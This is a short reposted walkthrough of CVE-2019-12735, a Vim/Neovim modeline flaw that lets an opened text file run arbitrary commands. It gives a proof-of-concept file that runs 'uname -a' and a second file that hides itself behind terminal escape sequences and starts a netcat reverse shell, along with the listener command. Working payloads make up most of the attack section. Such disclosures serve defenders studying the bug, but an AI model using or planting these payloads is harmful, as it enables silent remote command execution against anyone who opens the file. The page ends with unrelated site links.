Text editor Vim / Neovim arbitrary code execution vulnerability (CVE-2019-12735)

Others 2019-06-06 16:56:27 views: null

Affected versions:

Vim < 8.1.1365, Neovim < 0.3.6

Prerequisite: open modeline

 

0x01 open modeline

Add a line to your .vimrc file in your home:

set the pattern

 

Shortly 0x02

Create a file poc.txt, content

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Enter the command $ vim poc.txt

The system will uname -a

 

0x03 rebound shell

Creating shell.txt, reads as follows

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

Open two terminals:

An input command $ nc -lvvp 9999

Another command $ vim shell.txt

Success rebound shell

 

Reference links:

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md

Guess you like

Origin www.cnblogs.com/paperpen/p/10984502.html
Recommended
Open Source Daily | Linus declares war on "passive voice"; the big language model that understands human nature best; native Hongmeng is a new technical framework; open source version of Bloomberg terminal; big model "eats free food hard"
Ranking
Flutter-desktop
container 和container-fluid
One point nearly three cut Long Baoying skills invitation code 88118877
jsonEditor usage
Installation and use of Git (super detailed tutorial)
深入理解Moby Buildkit系列 #25 - Pipe设计原理
flinkcdc data collection code FlinkAPI
[Problem] Record compile-time error cordova: CordovaLib: _internal_aapt2_binary
Idea view properties Chinese into unicode code how to solve
mpvue build WeChat applet project
Daily
More
2024-10-09(1)
2024-10-08(1)
2024-10-07(1)
2024-10-06(15)
2024-10-05(7)
2024-10-04(1)
2024-10-03(7)
2024-10-02(1)
2024-10-01(0)
2024-09-30(0)

Code World

© 2018 codetd.com